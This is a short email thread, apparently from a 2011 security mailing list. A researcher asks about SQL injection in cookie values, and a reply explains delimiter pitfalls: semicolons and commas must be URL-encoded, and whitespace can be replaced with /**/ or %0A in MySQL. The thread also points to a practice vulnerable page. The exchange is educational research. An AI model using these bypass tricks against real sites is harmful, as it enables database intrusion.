Thank you guys for the help! @albino: Concerning the ";" and " " didn't know about this :) But it's very logical. @Anurag: Sure, the SQLi can just be in cookies variables when not sanitized. @Sandro: The video is awsome. Thank you for the links. Cheers 2011/8/28 <albinowax@gmail.com> > I have an example page vulnerable to cookie-based SQLi at > http://hackxor.sourceforge.net/cgi-bin/portal.pl (and a similar page > with a slightly different exploit using JSP in the download) > > Predictable self-promotion aside, cookie-based SQLi is very similar to > get/post based SQLi, except that certain characters can't be used. For > example, ';' and ',' are typically treated as delimiters, so they end > the injection if they aren't URL-encoded. A lot of these rules are > server specific though; Tomcat6/JSP treats whitespace as a delimeter > (which is easy to work around in mysql by using /**/ or %0A instead). > > albino > > On Sun, 28 Aug 2011 15:47 +0200, "OxFFFF 1336" > <0x1336.9@gmail.com> wrote: > > Hey there, > > > > I'm doing some researchs concerning SQL injection in cookies > variable and I want to now if there are previous papers or > materials related to this. > > > > I'll be glad if you can help me with this :) > > > > Many thanx in advance, > > > > Cheers > > >